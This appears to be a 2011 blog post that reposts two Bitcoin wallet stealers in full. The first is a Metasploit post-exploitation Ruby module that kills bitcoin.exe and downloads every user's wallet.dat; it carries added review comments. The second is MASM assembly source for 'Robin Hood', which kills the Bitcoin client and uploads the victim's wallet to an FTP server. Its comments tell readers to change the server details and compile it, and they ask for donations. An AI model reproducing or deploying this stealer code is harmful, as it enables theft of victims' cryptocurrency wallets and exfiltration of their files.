Insurgency Mod Scum: cheaters, hackers, wallhackers, aimbotters, griefers, teamkillers, micspammers, spawncampers, exitcampers, and everything else Insurgency.
Blogger.com policy on personal information: Personal and confidential information: It's not ok to publish another person's personal and confidential information. For example, don't post someone else's credit card numbers, Social Security numbers, unlisted phone numbers, and driver's license numbers. Also, please keep in mind that in most cases, information that is already available elsewhere on the Internet or in public records is not considered to be private or confidential under our policies.
All information posted on Insurgency Mod Scum is publicly available.

Robin Hood Bitcoin Jacker

2011-07-11

http://dev.metasploit.com/redmine/projects/framework/repository/revisions/12993/entry/modules/post/windows/gather/bitcoin_jacker.rb

# $Id: bitcoin_jacker.rb 12993 2011-06-21 03:26:07Z hdm $

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'


class Metasploit3 < Msf::Post
  # Post-exploitation module: looks for a Bitcoin wallet.dat in every user
  # profile on the compromised host, tries to stop bitcoin.exe, reads each
  # wallet over the session and records it with store_loot.
  # It needs an already-established meterpreter session ('SessionTypes'
  # below); it contains no code for gaining a foothold.
  #
  # Defensive reading of what the code below touches:
  #   - host: a bitcoin.exe termination request followed by reads of
  #     <profile>\...\Bitcoin\wallet.dat across several profile directories.
  #   - network: the file bytes travel over the existing meterpreter session
  #     (session.fs.file reads); no separate channel is opened.
  include Msf::Auxiliary::Report

  # Module metadata. 'Version' carries the SVN $Revision$ keyword verbatim.
  def initialize(info={})
    super( update_info( info,
      'Name' => 'Windows Gather Bitcoin wallet.dat',
      'Description' => %q{ This module downloads any Bitcoin wallet.dat files from the target system},
      'License' => MSF_LICENSE,
      'Author' => [ 'illwill '],
      'Version' => '$Revision: 12993 $',
      'Platform' => [ 'windows' ],
      'SessionTypes' => [ 'meterpreter' ]
    ))
  end

  # Entry point. Chooses the profile-directory layout from the sysinfo OS
  # string, then visits every profile collected by get_users.
  def run
    print_status("Checking All Users For Bitcoin Wallet...")
    os = session.sys.config.sysinfo['OS']
    drive = session.fs.file.expand_path("%SystemDrive%")

    # Vista/7/2008 keep roaming data under \Users\<name>\AppData\Roaming.
    # Any OS string the regex does not match (including unlisted newer
    # versions) falls through to the older "Documents and Settings" layout.
    if os =~ /Windows 7|Vista|2008/
      @appdata = '\\AppData\\Roaming\\'
      @users = drive + '\\Users'
    else
      @appdata = '\\Application Data\\'
      @users = drive + '\\Documents and Settings'
    end

    get_users    # fills @userpaths

    @userpaths.each do |path|
      jack_wallet(path)
    end
  end

  # Reads one user's wallet.dat, if present, and stores it as loot.
  # @param path [String] a profile directory with trailing backslash, as
  #   built by get_users; @appdata is appended to reach the Bitcoin folder.
  def jack_wallet(path)
    data = ""
    filename = "#{path}#{@appdata}\\Bitcoin\\wallet.dat"
    # stat raises when the file is absent; the rescue modifier turns that
    # (and any other stat failure) into nil, so the profile is skipped silently.
    found = client.fs.file.stat(filename) rescue nil
    return if not found

    # NOTE(review): "#(unknown)" here and in the print_error below looks like
    # a mangled interpolation (presumably filename) — verify against the
    # upstream revision before relying on the output text.
    print_status("Wallet Found At #(unknown)")
    print_status(" Jackin their wallet...")

    # Attempt to stop the client before reading the file (see kill_bitcoin);
    # a failed kill is not reported, so the read proceeds either way.
    kill_bitcoin

    begin
      wallet = session.fs.file.new(filename, "rb")
      # The whole file is buffered in memory, then written once via store_loot.
      # The handle is not closed explicitly on either path.
      until wallet.eof?
        data << wallet.read
      end
      store_loot("bitcoin.wallet", "application/octet-stream", session, data, filename, "Bitcoin Wallet")
      print_status(" Wallet Jacked.")
    rescue ::Interrupt
      raise $!                  # let an operator interrupt propagate
    rescue ::Exception => e     # anything else is logged and swallowed
      print_error("Failed to download #(unknown): #{e.class} #{e}")
    end
  end

  # Fills @userpaths with "<@users>\<name>\" for each entry of the profile
  # root, skipping the well-known non-user entries listed in the regex.
  def get_users
    @userpaths = []
    session.fs.dir.foreach(@users) do |path|
      next if path =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
      @userpaths << "#{@users}\\#{path}\\"
    end
  end

  # Requests termination of every process named bitcoin.exe (case-insensitive
  # compare). Kill errors are discarded by the rescue modifier, so a process
  # that survives is neither retried nor reported.
  def kill_bitcoin
    client.sys.process.get_processes().each do |x|
      if x['name'].downcase == "bitcoin.exe"
        print_status(" #{x['name']} Process Found...")
        print_status(" Killing Process ID #{x['pid']}...")
        session.sys.process.kill(x['pid']) rescue nil
      end
    end
  end
end

http://forums.gothack.net/showthread.php?18-Bitcion-Stealer
http://illmob.org/Sources/RobinHood.html

; ::Click Here Download Source Here::
; Robin Hood - BitCoin Jacker
; by [ill]will
; steal from the rich and give to the poor
; by dumping the wallet to "public" ftp
;
; Send Me Money if it makes you rich :D
; 14P9t8ceqRzvJ4KhMWnjKQ4TwcLxWwk7j4
; 'randomize' proc found somewhere on the net
; ftp.microsoft.com does not let you upload files
; so change the info and compile with MASM
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

include \masm32\include\masm32rt.inc
include \masm32\include\wininet.inc
includelib \masm32\lib\wininet.lib

FTPit PROTO :DWORD,:DWORD,:DWORD
KillMe PROTO :DWORD
Randomize PROTO
Random PROTO :DWORD
ThePort equ 21

.data
ftpsite db "ftp.microsoft.com",0 ;change the server
Username db "anonymous",0 ;change the username
Password db "bitcoin@microsoft.com",0 ;change the password
szTheVictim db "bitcoin.exe",0
RandWallet db "%s-wallet.dat",0
AppData db "AppData",0
wallet db "%s\Bitcoin\wallet.dat",0
random_seed dd ?
res dd 0
sFmt db '%u',0
sBuf db 10 dup(0)


.data?
buffer db MAX_PATH dup(?)
WalletPath db 256 dup(?)
WalletFTP db 256 dup(?)
szBuffer db 256 dup(?)

.code

start:

invoke KillMe, addr szTheVictim ;kill the bitcoin process
invoke Randomize ;generate a random number
invoke Random,9999999
mov res,EAX
invoke wsprintf,ADDR sBuf,ADDR sFmt,res ;append it to our ftp upload filename
invoke wsprintf,addr WalletFTP,addr RandWallet, addr sBuf ;ex: 9586293-wallet.dat

invoke GetEnvironmentVariable, addr AppData, addr buffer, sizeof buffer ;get the %AppDATA% folder
invoke wsprintf,addr WalletPath,addr wallet, addr buffer ;append the bitcoin wallet

invoke FTPit, addr ftpsite, addr WalletPath,addr WalletFTP ; send that shit to a public ftp
invoke ExitProcess, 0



FTPit PROC FTPserver:DWORD, lpszFile:DWORD, lpRemoteFile:DWORD
local hInternet:DWORD
local ftpHandle:DWORD
local context:DWORD
local InternetStatusCallback:DWORD
invoke InternetOpen,NULL,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
mov hInternet, eax
invoke InternetConnect,hInternet,FTPserver,ThePort ,\ ;if different port change INTERNET_DEFAULT_FTP_PORT to port #
ADDR Username,ADDR Password,INTERNET_SERVICE_FTP,\
INTERNET_FLAG_PASSIVE,ADDR context
mov ftpHandle,eax
invoke FtpPutFile,ftpHandle,lpszFile,lpRemoteFile,FTP_TRANSFER_TYPE_BINARY,NULL
invoke InternetCloseHandle,ftpHandle
invoke InternetCloseHandle, hInternet
ret
err:
invoke GetErrDescription,eax
ret
FTPit endp



Random proc dwBase:dword
push ebx
mov eax,dwBase
xor ebx,ebx
imul edx,random_seed,08088405h
inc edx
mov random_seed,edx
mul edx
mov eax,edx
pop ebx
ret
Random endp

Randomize proc
invoke GetTickCount
mov random_seed,eax
ret
Randomize endp

KillMe proc szFile:dword
LOCAL Process:PROCESSENTRY32

mov Process.dwSize, sizeof Process
invoke CreateToolhelp32Snapshot, 2, 0
mov esi, eax
invoke Process32First, esi, addr Process
@@loop:
invoke lstrcmpiA,szFile, addr Process.szExeFile
test eax, eax
jnz @@continue
invoke OpenProcess, 0001h, 0, Process.th32ProcessID
invoke TerminateProcess, eax, 0
@@continue:
invoke Process32Next, esi, addr Process
test eax, eax
jz @@done
jmp @@loop
@@done:
invoke CloseHandle, esi
ret
KillMe endp


end start
